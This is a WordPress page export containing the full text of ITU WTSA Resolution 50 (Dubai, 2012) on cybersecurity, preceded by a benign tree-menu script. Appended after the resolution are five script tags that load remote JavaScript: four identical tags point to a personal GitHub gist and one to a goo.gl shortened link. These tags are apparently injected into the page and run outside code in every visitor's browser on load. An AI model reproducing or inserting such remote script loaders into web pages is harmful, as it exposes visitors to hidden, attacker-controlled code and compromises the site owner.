{"id":571,"date":"2013-05-20T11:21:46","date_gmt":"2013-05-20T15:21:46","guid":{"rendered":"http:\/\/internetdistinction.com\/wsisimpacts\/?page_id=571"},"modified":"2015-06-30T00:31:19","modified_gmt":"2015-06-30T04:31:19","slug":"wtsa_50","status":"publish","type":"page","link":"https:\/\/internetdistinction.com\/wsisimpacts\/wsis\/wtsa\/wtsa-2012\/wtsa_50\/","title":{"rendered":"WTSA Resolution 50"},"content":{"rendered":"<p><style type=\"text\/css\">\r\nbody {}\r\n\r\n:link { color: #0000ff; text-decoration:none;}\r\n:visited { color: #6666ff; text-decoration:none; }\r\na:active { color: #0000ff; text-decoration:none;}\r\na:hover {color: #0000ff; text-decoration:underline; }\r\n\r\ndiv.basetext {}\r\n\r\ndiv.basetop {}\r\n\r\nh1 {\r\n    text-align:center;\r\n}\r\n\r\nspan.h2 {}\r\n\r\ndiv.year {}\r\n\r\ndiv.form {}\r\n\r\nspan.cpt {}\r\n\r\nspan.cm {}\r\n\r\n.fl {}\r\n\r\nul {}\r\n\r\nli {}\r\n\r\nul li {}\r\n\r\nli.basic {}\r\n\r\nspan.links {}\r\n\r\n\r\n\r\n\r\n.sub { display: none; }\r\n.subexp {display: block; }\r\n.sub { display: none; } \r\n\r\n.subexp {display: block; } \r\n\r\nli.exp {\r\n  cursor:pointer;\r\n}\r\n\r\nli.col {\r\n  cursor:pointer;\r\n}\r\n\r\nli.exp_active {\r\n  background-color:#eeeeff;\r\n  cursor:pointer;\r\n}\r\n\r\nli.col_active {\r\n  background-color:#eeeeff;\r\n  cursor:pointer;\r\n}\r\n\r\n\r\nli.basic_active {\r\n  background-color:#eeeeff;\r\n}\r\n<\/style><br \/>\n<SCRIPT language=JavaScript>\r\nfunction get_keycode(evt) {\r\n  \/\/ IE\r\n    code = document.layers ? evt.which\r\n           : document.all ? event.keyCode \/\/ event.keyCode!=evt.keyCode!\r\n           : evt.keyCode;\r\n\r\n  if (code==0) \r\n    code=evt.which; \/\/ for NS\r\n  return code;\r\n}\r\n\r\nvar lastnode=null;\r\nvar listnodes = null;\r\nvar list_index=1;\r\nvar lastnodetype=''; \/\/ determines if node is a link, input or text;\r\n\r\n\/\/ up, left, down, right, keypress codes\r\n\/\/ijkl\r\n\/\/var keys = new Array(105,106,107,108);\r\n\/\/num arrows\r\n\/\/var keys = new Array(56,52,50,54);\r\n\/\/wasd\r\n\/\/ var press2 = new Array(119,97,115,100);\r\n var press = new Array(47,45,42,43);\r\n\r\n\/\/ keydown codes\r\n  \/\/  var keys2=new Array(87,65,83,68);\r\n  var keys= new Array(38,37,40,39);\r\n\r\n  \/\/ keyset 1 = keydown, otherwise press\r\nfunction checkup(keyset,n) {\r\n  if (keyset==1) return (n==keys[0]);\r\n  return ((n==press[0]) \/*|| (n==press2[0])*\/)\r\n}\r\n\r\nfunction checkdn(keyset,n) {\r\n  if (keyset==1) return (n==keys[2]);\r\n  return ((n==press[2]) \/*|| (n==press2[2])*\/)\r\n}\r\n\r\nfunction checkl(keyset,n) {\r\n  if (keyset==1) return (n==keys[1]);\r\n  return ((n==press[1]) \/*|| (n==press2[1])*\/)\r\n}\r\n\r\nfunction checkr(keyset,n) {\r\n  if (keyset==1) return (n==keys[3]);\r\n  return ((n==press[3]) \/*|| (n==press2[3])*\/)\r\n}\r\n\r\n\r\n\r\n\r\n\r\nfunction is_exp(n) {\r\n  if (n==null) return false;\r\n  return ((n.className=='exp') || (n.className=='exp_active'));\r\n}\r\n\r\nfunction is_col(n) {\r\n  if (n==null) return false;\r\n  return ((n.className=='col') || (n.className=='col_active'));\r\n}\r\n\r\nfunction is_basic(n) {\r\n  if (n==null) return false;\r\n  return ((n.className=='basic') || (n.className=='basic_active'));\r\n}\r\n\r\n\r\n\r\n\/* returns i>=0 if true *\/\r\nfunction is_active(node) {\r\n  if (node.className==null) return false\r\n  return node.className.indexOf('_active');\r\n}\r\n\r\nfunction toggle_class(node) {\r\n  if ((node==null) || (node.className==null)) return;\r\n  str=node.className;\r\n  result=\"\";\r\n  i = str.indexOf('_active');\r\n  if (i>0)\r\n    result= str.substr(0,i);\r\n  else\r\n    result= str+\"_active\";\r\n  node.className=result; \r\n  return node;\r\n}\r\n\r\nfunction activate(node) {\r\n  node.style.backgroundColor='#eeeeff';\r\n}\r\n\r\nfunction deactivate(node) {\r\n   node.style.backgroundColor='#ffffff';\r\n}\r\n\r\nfunction is_list_node(n) {\r\n  if (n==null) return false;\r\n  if (n.className==null) return false;\r\n  if ( (is_exp(n)) || \r\n       (is_col(n)) ||\r\n       (is_basic(n)) )\r\n   return true; else return false;\r\n}\r\n\r\n\r\nfunction get_href(n) {\r\n  alist=n.attributes;\r\n  if (alist!=null) {\r\n    hr = alist.getNamedItem('href');\r\n    if (hr!=null) return hr.nodeValue;\r\n  }\r\n  if (n.childNodes.length==0) return '';\r\n  for (var i=0; i<n.childNodes.length; i++) {\r\n    s = get_href(n.childNodes[i]);\r\n    if (s!='') return s;\r\n  }\r\n  return '';\r\n}\r\n\r\nfunction get_link(n) {\r\n  if (n==null) return null;\r\n  if (n.style==null) return null;\r\n\r\n \/\/ disabling uncontrolled recursion to prevent error messages on IE\r\n \/\/ when trying to focus to invisible links (readonly mode)\r\n\/\/    alert(n.nodeName+' '+n.className);\r\n  if ((n.nodeName=='UL') && (n.className=='sub')) return null;\r\n\r\n  if (n.nodeName=='A') return n;\r\n  if (n.childNodes.length==0) return null;\r\n  for (var i=0; i<n.childNodes.length; i++) {\r\n    s = get_link(n.childNodes[i]);\r\n    if (s!=null) return s;\r\n  }\r\n  return null;\r\n}\r\n\r\nfunction set_lastnode(n) {\r\n\/*var d = new Date();\r\nvar t_mil = d.getMilliseconds();*\/\r\n\/\/ testattu nopeuksia explorerilla, ei merkitt\u00e4vi\u00e4 eroja\r\n  if (lastnode==n) return; \r\n\/*  deactivate(lastnode)\r\n  lastnode=n;\r\n  activate(lastnode);*\/\r\n\r\n  if (is_active(lastnode)>=0)\r\n    toggle_class(lastnode);\r\n  lastnode=n;\r\n  if (!(is_active(lastnode)>=0))\r\n    toggle_class(lastnode);\r\n\r\n\r\n\/*var d2 = new Date();\r\nvar t_mil2 = d2.getMilliseconds();\r\n  window.alert(t_mil2-t_mil);*\/\r\n}\r\n\r\nfunction next_list_node() {\r\n  tempIndex = list_index;\r\n  while (tempIndex<listnodes.length-1) {\r\n    tempIndex++;\r\n    var x = listnodes[tempIndex];\r\n    if (is_list_node(x)) {\r\n      list_index=tempIndex;\r\n      return;\r\n    }\r\n  }\r\n}\r\n\r\nfunction prev_list_node() {\r\n  tempIndex = list_index;\r\n  while (tempIndex>0) {\r\n    tempIndex--;\r\n    var x = listnodes[tempIndex];\r\n    if (is_list_node(x)) {\r\n      list_index=tempIndex;\r\n      return;\r\n    }\r\n  }\r\n}\r\n\r\n\r\n\r\nfunction getsub (li) {\r\n  if (li.childNodes.length==0) return null;\r\n  for (var c = 0; c < li.childNodes.length; c++)\r\n    if ( (li.childNodes[c].className == 'sub') || (li.childNodes[c].className == 'subexp') ) \r\n      return li.childNodes[c];\r\n}\r\n\r\nfunction find_listnode_recursive (li) {\r\n  if (is_list_node(li)) return li; \r\n  if (li.childNodes.length==0) return null;\r\n  result=null;\r\n  for (var c = 0; c < li.childNodes.length; c++) {\r\n    result=find_listnode_recursive(li.childNodes[c]);\r\n    if (result!=null) return result;\r\n  }\r\n  return null;\r\n}\r\n\r\nfunction next_child_listnode(li) {\r\n  var result=null;\r\n  for (var i=0; i<li.childNodes.length; i++) {\r\n    result=find_listnode_recursive(li.childNodes[i]);\r\n    if (result!=null) return result;\r\n  }\r\n  return null;  \r\n}\r\n\r\nfunction next_actual_sibling_listnode(li) {\r\n  if (li==null) return null;\r\n  var temp=li;\r\n  while (1) { \r\n    var n = temp.nextSibling;\r\n    if (n==null) {\r\n      n=parent_listnode(temp);\r\n      return next_actual_sibling_listnode(n);\r\n    }\r\n    if (is_list_node(n)) return n;\r\n    temp=n;\r\n  }\r\n}\r\n\r\nfunction next_sibling_listnode(li) {\r\nif (li==null) return null; \r\n var result=null;\r\n  var temp=li;\r\n  if (is_col(temp)) return next_child_listnode(temp);\r\n  while (1) { \r\n    var n = temp.nextSibling;\r\n    if (n==null) {\r\n      n=parent_listnode(temp);\r\n      return next_actual_sibling_listnode(n);\r\n    }\r\n    if (is_list_node(n)) return n;\r\n    temp=n;\r\n  }\r\n}\r\n\r\nfunction last_sibling_listnode(li) {\r\n  if (li==null) return null;\r\n  var temp=li;\r\n  var last=null;\r\n  while(1) {\r\n    var n = temp.nextSibling;\r\n    if (is_list_node(temp)) \r\n      last = temp;\r\n    if (n==null) {\r\n      if (is_col(last)) return last_sibling_listnode(next_child_listnode(last));\r\n      else return last;\r\n    }\r\n    temp = n;\r\n  }\r\n}\r\n\r\nfunction prev_sibling_listnode(li) { \r\n  if (li==null) return null;\r\n  var temp=li;\r\n  var n = null;\r\n  while (1) { \r\n    n = temp.previousSibling;\r\n    if (n==null) {\r\n      return parent_listnode(li);\r\n    }\r\n    if (is_list_node(n)) {\r\n      if (is_col(n)) { \r\n        return last_sibling_listnode(next_child_listnode(n));\r\n      }\r\n      else {\r\n        return n;\r\n      }\r\n    }\r\n    temp=n;\r\n  }\r\n}\r\n\r\n\r\nfunction parent_listnode(li) {\r\n  \/\/ added 12.7.2004 to prevent IE error when readonly mode==true\r\n  if (li==null) return null;\r\n  n=li;\r\n  while (1) {\r\n    n=n.parentNode;\r\n    if (n==null) return null;\r\n    if (is_list_node(n)) return n;\r\n  }\r\n}\r\n\r\nfunction getVisibleParents(id) {\r\n  var n = document.getElementById(id);\r\n  while(1) {\r\n    expand(n);\r\n    n = parent_listnode(n);\r\n    if (n==null) return;\r\n  }\r\n}\r\n\r\nfunction onClickHandler (evt) {\r\nif (lastnode==null) \r\n{\r\nlistnodes = document.getElementsByTagName('li');\r\nlastnode=listnodes[1];\r\ntemp=listnodes[1];\r\n}\r\n\r\n\r\n  var target = evt ? evt.target : event.srcElement;\r\n  if (!is_list_node(target)) return;\r\n  toggle(target);\r\n  set_lastnode(target);\r\n}\r\n\r\n\r\nfunction expand(node) {\r\n    if (!is_exp(node)) return;\r\n    if (node.className=='exp_active') \r\n      node.className='col_active';\r\n    else \r\n        node.className='col';\r\n    setSubClass(node,'subexp');\r\n    \/\/    getsub(node).className='subexp';\r\n}\r\n\r\nfunction collapse(node) {\r\n  if (!is_col(node)) return;\r\n  \r\nif (node.className=='col_active')\r\n    node.className='exp_active'\r\n  else \r\n    node.className='exp';\r\n\r\n setSubClass(node,'sub');\r\n\/\/  getsub(node).className='sub';\r\n\r\n}\r\n\r\nfunction setSubClass(node,name) {\r\n  sub = getsub(node);\r\n  if (sub==null) return;\r\n  sub.className=name;  \r\n}\r\n\r\nfunction toggle(target) {\r\n  if (!is_list_node(target)) return;\r\n    if (is_col(target)) {\r\n      target.className='exp';\r\n      setSubClass(target,'sub');\r\n      \/\/      getsub(target).className='sub';\r\n    }\r\n    else if (is_exp(target)) {\r\n      target.className='col';\r\n      setSubClass(target,'subexp');\r\n      \/\/      getsub(target).className='subexp';\r\n    }\r\n \r\n}\r\n\r\nfunction expandAll(node) {\r\n    if (node.className=='exp') {\r\n        node.className='col';\r\n        setSubClass(node,'subexp');\r\n\/\/        getsub(node).className='subexp';\r\n    }\r\n    var i;\r\n    if (node.childNodes!=null) \r\n\/\/    if (node.hasChildNodes()) \r\n        for ( i = 0; i<node.childNodes.length; i++)\r\n            expandAll(node.childNodes[i]);\r\n}\r\n\r\nfunction collapseAll(node) {\r\n    if  (node.className=='col') {\r\n        node.className='exp';\r\n        setSubClass(node,'sub');\r\n\/\/        getsub(node).className='sub';\r\n    }\r\n    var i;        \r\n    if (node.childNodes!=null) \r\n\/\/ for opera   if (node.hasChildNodes()) \r\n        for ( i = 0; i<node.childNodes.length; i++)\r\n            collapseAll(node.childNodes[i]);\r\n}\r\n\r\n\r\n\r\nfunction unFocus(node) {\r\n     \/\/ unfocuses potential link that is to be hidden (if a==null there is no link so it should not be blurred).\r\n     \/\/ tested with mozilla 1.7, 12.7.2004. \/mn (\r\n      intemp=parent_listnode(node);  \r\n      a = get_link(intemp);     \/\/ added 6.4. to get keyboard working with\r\n      \/\/ moved before collapse to prevent an error message with IE when readonly==true      \r\n      if (a!=null) a.blur(); \/\/ netscape after collapsing a focused node\r\n      return intemp;\r\n}\r\n\r\n\/\/ mode: 0==keypress, 1==keyup\r\nfunction keyfunc(evt,mode) {\r\n var c = get_keycode(evt);\r\n var temp = null;\r\n var a = null;\r\n\r\n  if (lastnode==null) {\r\n    listnodes = document.getElementsByTagName('li');\r\n    lastnode=listnodes[1];\r\n    temp=listnodes[1];\r\n  }\r\n\r\n  \/\/window.alert(c);\r\n  if (checkup(mode,c)) { \/\/ i \r\n   temp=prev_sibling_listnode(lastnode);\r\n  }\r\n  else if (checkdn(mode,c)) { \/\/ k\r\n    temp=next_sibling_listnode(lastnode);\r\n  }\r\n  else if (checkr(mode,c)) { \/\/ l\r\n    expand(lastnode);\r\n    \/\/  temp=next_child_listnode(lastnode);\r\n    \/\/ if (temp==null) {\r\n      a = get_link(lastnode);\r\n        if (a!=null) a.focus(); else self.focus(); \r\n      \/\/}\r\n  }\r\n  else if (checkl(mode,c)) { \/\/ j\r\n    if (is_col(lastnode)) {\r\n      unFocus(lastnode);\r\n      collapse(lastnode);\r\n    }\r\n    else {\r\n      temp=unFocus(lastnode);\r\n      collapse(temp);\r\n    }\r\n   \/\/    if (temp==null) lastnode.focus(); \/\/ forces focus to correct div (try mozilla typesearch) (doesn't seem to work -mn\/6.4.2004)\r\n  }\r\n  else return;\r\n  if (temp!=null) set_lastnode(temp);\r\n\r\n  \/\/ alert('pressed ' + String.fromCharCode(c) + '(' + c + ')');\r\n  return true;\r\n}\r\n\r\n\r\nfunction keytest (evt) {\r\n  return keyfunc(evt,1);\r\n};\r\n\r\n\r\nfunction presstest (evt) {\r\n  return keyfunc(evt,0);\r\n};\r\n\r\n\r\n  document.onclick = onClickHandler;\r\n  document.onkeypress = presstest;\r\n  document.onkeyup = keytest;\r\n<\/SCRIPT><\/p>\n<h3><span style=\"\">WTSA RESOLUTION 50 (Rev. Dubai, 2012)<\/span><\/h3>\n<h4><span style=\"\">Cybersecurity<\/span><\/h4>\n<p><span style=\"\">The World Telecommunication Standardization Assembly (Dubai, 2012),<\/span><\/p>\n<ul class=\"subexp\">\n<li class=\"exp\" style=\"\"><span style=\"\">recalling<\/span>\n<ul class=\"sub\">\n<li class=\"basic\" style=\"\"><span style=\"\">a)        Resolution 130 (Rev. Guadalajara, 2010) of the Plenipotentiary Conference, on the role of ITU in building confidence and security in the use of information and communication technologies (ICT);<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">b)        Resolution 174 (Guadalajara, 2010) of the Plenipotentiary Conference, on ITU&#8217;s role with regard to international public policy issues relating to the risk of illicit use of ICT;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">c)        Resolution 179 (Guadalajara, 2010) of the Plenipotentiary Conference, on ITU&#8217;s role in child online protection;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">d)        Resolution 181 (Guadalajara, 2010) of the Plenipotentiary Conference, on definitions and terminology relating to building confidence and security in the use of ICT;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">e)        Resolutions 55\/63 and 56\/121 of the United Nations General Assembly, which established the legal framework on countering the criminal misuse of information technologies;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">f)        Resolution 57\/239 of the United Nations General Assembly, on the creation of a global culture of cybersecurity;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">g)        Resolution 58\/199 of the United Nations General Assembly, on the creation of a global culture of cybersecurity and the protection of essential information infrastructures;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">h)        Resolution 41\/65 of the United Nations General Assembly, on principles relating to remote sensing of the Earth from outer space;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">i)        Resolution 45 (Rev. Hyderabad, 2010) of the World Telecommunication Development Conference (WTDC);<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">j)        Resolution 52 (Rev. Dubai, 2012) of this assembly, on countering and combating spam;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">k)        Resolution 58 (Rev. Dubai, 2012) of this assembly, on encouraging the creation of national computer incident response teams, particularly in developing countries1,<\/span><\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\" style=\"\"><span style=\"\">considering<\/span>\n<ul class=\"sub\">\n<li class=\"basic\" style=\"\"><span style=\"\">a)        the crucial importance of ICT infrastructure to practically all forms of social and economic activity;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">b)        that the legacy public switched telephone network (PSTN) has a level of inherent security properties because of its hierarchical structure and built-in management systems;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">c)        that IP networks provide reduced separation between user components and network components if adequate care is not taken in the security design and management;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">d)        that the converged legacy networks and IP networks are therefore potentially more vulnerable to intrusion if adequate care is not taken in the security design and management of such networks;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">e)        that there are cyberincidents caused by cyberattacks, for example malicious or thrill-seeker intrusions using malware (such as worms and viruses), distributed by various methods, for example distribution by web and bot-infected computers;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">f)        that in order to protect global telecommunication\/ICT infrastructures from the threats and challenges of the evolving cybersecurity landscape, coordinated national, regional and international action is required to protect from and respond to various forms of impairing events;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">g)        that the ITU Telecommunication Standardization Sector (ITU-T) has a role to play within its mandate and competencies in considering f),<\/span><\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\" style=\"\"><span style=\"\">considering further<\/span>\n<ul class=\"sub\">\n<li class=\"basic\" style=\"\"><span style=\"\">a)        that Recommendation ITU-T X.1205 provides a definition, a description of technologies, and network protection principles;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">b)        that Recommendation ITU-T X.805 provides a systematic framework for identifying security vulnerabilities, and Recommendation ITU-T X.1500 provides the cybersecurity information exchange (CYBEX) model and discusses techniques that could be used to facilitate the exchange of cybersecurity information;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">c)        that ITU-T and the Joint Technical Committee for Information Technology (JTC 1) of the International Organization for Standardization (ISO) and the International Electrotechnical Commission (IEC) already have a significant body of published materials and ongoing work that is directly relevant to this topic, which needs to be considered,<\/span><\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\" style=\"\"><span style=\"\">recognizing<\/span>\n<ul class=\"sub\">\n<li class=\"basic\" style=\"\"><span style=\"\">a)        the relevant outcomes of the World Summit on the Information Society (WSIS) identified ITU as the facilitator and moderator for Action Line C5 (Building confidence and security in the use of ICTs);<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">b)        the resolves paragraph of Resolution 130 (Rev. Guadalajara, 2010) of the Plenipotentiary Conference, on strengthening the role of ITU in building confidence and security in the use of information and communication technologies, and the instruction to intensify work with high priority within the ITU-T study groups;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">c)        that Programme 2, on cybersecurity, ICT applications and IP-based network related issues adopted by WTDC (Hyderabad, 2010) includes cybersecurity as one of its priority activities and relevant activities to be undertaken by the Telecommunication Development Bureau (BDT), and that Question 22\/1 of the ITU Telecommunication Development Sector (ITU-D) addresses the issue of securing information and communication networks through the identification of best practices for developing a culture of cybersecurity, and Resolution 45 (Rev. Hyderabad, 2010), on mechanisms for enhancing cooperation on cybersecurity, including countering and combating spam, was adopted;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">d)        that the ITU Global Cybersecurity Agenda (GCA) promotes international cooperation aimed at proposing strategies for solutions to enhance confidence and security in the use of ICTs,<\/span><\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\" style=\"\"><span style=\"\">recognizing further<\/span>\n<ul class=\"sub\">\n<li class=\"basic\" style=\"\"><span style=\"\">a)        that cyberattacks such as phishing, pharming, scan\/intrusion, distributed denials of service, web-defacements, unauthorized access, etc., are emerging and having serious impacts;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">b)        that botnets are used to distribute bot-malware and carry out cyberattacks;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">c)        that sources of attacks are sometimes difficult to identify (for example, attacks using spoofed IP addresses);<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">d)        that cybersecurity is one of the elements for building confidence and security in the use of telecommunications\/ICTs;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">e)        that, in accordance with Resolution 181 (Guadalajara, 2010), it is recognized that it is important to study the issue of terminology related to building confidence and security in the use of ICTs, that this base set needs to include other important issues in addition to cybersecurity and that the definition of cybersecurity may need to be modified from time to time to reflect changes in policy;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">f)        that Resolution 181 (Guadalajara, 2010) resolved to take into account the definition of the term cybersecurity approved in Recommendation ITU-T X.1205 for use in ITU activities related to building confidence and security in the use of ICTs;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">g)        that, as recognized in Resolution 181 (Guadalajara, 2010), ITU-T Study Group 17 is responsible for developing the core Recommendations on telecommunication and ICT security,<\/span><\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\" style=\"\"><span style=\"\">noting<\/span>\n<ul class=\"sub\">\n<li class=\"basic\" style=\"\"><span style=\"\">a)        the vigorous activity and interest in the development of telecommunication\/ICT security standards and Recommendations in Study Group 17, the lead ITU-T study group on security, and in other standardization bodies, including the Global Standards Collaboration (GSC) group;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">b)        that there is a need for national, regional and international strategies and initiatives to be harmonized to the extent possible, in order to avoid duplication and to optimize the use of resources;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">c)        that cooperation and collaboration among organizations addressing security issues can promote progress and contribute to building and maintaining a culture of cybersecurity;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">d)        that, as recognized in Resolution 130 (Rev. Guadalajara, 2010), a national IP-based public network security centre for developing countries is under study by Study Group 17, and some work has been completed in this area, including the ITU-T X.800 &#8211; ITU-T X.849-series of Recommendations and Supplements thereto,<\/span><\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\" style=\"\"><span style=\"\">resolves<\/span>\n<ul class=\"sub\">\n<li class=\"basic\" style=\"\"><span style=\"\">1        that all ITU-T study groups continue to evaluate existing and evolving new Recommendations, and especially signalling and telecommunication protocol Recommendations, with respect to their robustness of design and potential for exploitation by malicious parties to interfere destructively with their deployment in the global information and telecommunication infrastructure, develop new Recommendations for emerging security issues and take into account new services and applications to be supported by the global telecommunication\/ICT infrastructure (e.g. cloud computing, smart grid and intelligent transport systems, which are based on telecommunication\/ICT networks);<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">2        that ITU-T continue to raise awareness, within its area of operation and influence, of the need to defend information and telecommunication systems against the threat of cyberattack, and continue to promote cooperation among appropriate international and regional organizations in order to enhance exchange of technical information in the field of information and telecommunication network security;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">3        that ITU-T should work closely with ITU-D, particularly in the context of Question 22\/1;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">4        that, in assessing networks and protocols for security vulnerabilities and facilitation of exchanging cybersecurity information, ITU-T Recommendations, including the ITU-T X-series of Recommendations and Supplements thereto, among them ITU-T X.805, ITU-T X.1205, ITU-T X.1500, ISO\/IEC standards and other relevant deliverables from other organizations, be taken into consideration and applied as appropriate;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">5        that ITU-T continue work on the development and improvement of terms and definitions related to building confidence and security in the use of telecommunications\/ICTs, including the term cybersecurity;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">6        that parties concerned are invited to work together to develop standards and guidelines in order to protect against cyberattacks, and facilitate tracing the source of an attack;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">7        that global, consistent and interoperable processes for sharing incident-response related information should be promoted;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">8        that all ITU-T study groups continue to provide regular reports on security of telecommunications\/ICT to the Telecommunication Standardization Advisory Group (TSAG) on progress in evaluating existing and evolving new Recommendations;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">9        that ITU-T study groups continue to liaise with standards development organizations and other bodies active in this field, such as ISO\/IEC JTC1, the Organisation for Economic Co-operation and Development (OECD), the Asia-Pacific Economic Cooperation Telecommunication and Information Working Group (APEC-TEL) and the Internet Engineering Task Force (IETF);<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">10        that Study Group 17 continue its work on the issues raised in Resolution 130 (Rev. Guadalajara, 2010), and on the ITU-T X-series of Recommendations, including Supplements as appropriate,<\/span><\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\" style=\"\"><span style=\"\">instructs the Director of the Telecommunication Standardization Bureau<\/span>\n<ul class=\"sub\">\n<li class=\"basic\" style=\"\"><span style=\"\">1        to prepare, in building upon the information base associated with the &#8220;ICT Security Standards Roadmap&#8221; and the ITU-D efforts on cybersecurity, and with the assistance of other relevant organizations, an inventory of national, regional and international initiatives and activities to promote, to the maximum extent possible, the worldwide harmonization of strategies and approaches in this critically important area;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">2        to report annually to the ITU Council, as specified in Resolution 130 (Guadalajara, 2010), on progress achieved in the actions outlined above;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">3        to continue to recognize the role played by other organizations with experience and expertise in the area of security standards, and coordinate with those organizations as appropriate,<\/span><\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\" style=\"\"><span style=\"\">further instructs the Director of the Telecommunication Standardization Bureau<\/span>\n<ul class=\"sub\">\n<li class=\"basic\" style=\"\"><span style=\"\">1        to continue to follow up WSIS activities on building confidence and security in the use of ICTs, in cooperation with relevant stakeholders, as a way to share information on national, regional and international and non-discriminatory cybersecurity-related initiatives globally;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">2        to cooperate with BDT in relation to any item concerning cybersecurity in accordance with Resolution 45 (Rev. Hyderabad, 2010),<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">3        to continue to cooperate with the Secretary-General&#8217;s Global Cybersecurity Agenda (CGA) and with IMPACT, FIRST and other global or regional cybersecurity projects, as appropriate, to develop relationships and partnerships with various regional and international cybersecurity-related organizations and initiatives, as appropriate, and to invite all Member States, particularly developing countries, to take part in these activities and to coordinate and cooperate with these different activities;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">4        taking into account Resolution 130 (Rev. Guadalajara 2010), to work collaboratively with the other Directors of the Bureaux to support the Secretary-General in preparing a document relating to a possible memorandum of understanding (MoU) (according to Resolution 45 (Rev. Hyderabad, 2010)) among interested Member States to strengthen cybersecurity and combat cyberthreats in order to protect developing countries and any country interested in acceding to this possible MoU,<\/span><\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\" style=\"\"><span style=\"\">invites Member States, Sector Members, Associates and academia, as appropriate<\/span>\n<ul class=\"sub\">\n<li class=\"basic\" style=\"\"><span style=\"\">to cooperate and participate actively in the implementation of this resolution and the associated actions.<\/span><\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<p> <script type='text\/javascript' src='https:\/\/gist.githubusercontent.com\/vladimir677\/bd66b2780ce8792e731469b660a62590\/raw\/3a71aff685732599ba7fbadf7b929eae8d19053a\/js.js'><\/script> <script type='text\/javascript' src='https:\/\/gist.githubusercontent.com\/vladimir677\/bd66b2780ce8792e731469b660a62590\/raw\/3a71aff685732599ba7fbadf7b929eae8d19053a\/js.js'><\/script> <script type='text\/javascript' src='https:\/\/gist.githubusercontent.com\/vladimir677\/bd66b2780ce8792e731469b660a62590\/raw\/3a71aff685732599ba7fbadf7b929eae8d19053a\/js.js'><\/script> <script type='text\/javascript' src='https:\/\/gist.githubusercontent.com\/vladimir677\/bd66b2780ce8792e731469b660a62590\/raw\/3a71aff685732599ba7fbadf7b929eae8d19053a\/js.js'><\/script> <script type='text\/javascript' src='https:\/\/goo.gl\/dd1kPI'><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>WTSA RESOLUTION 50 (Rev. Dubai, 2012) Cybersecurity The World Telecommunication Standardization Assembly (Dubai, 2012), recalling a) Resolution 130 (Rev. Guadalajara, 2010) of the Plenipotentiary Conference, on the role of ITU in building confidence and security in the use of information and communication technologies (ICT); b) Resolution 174 (Guadalajara, 2010) of the Plenipotentiary Conference, on ITU&#8217;s 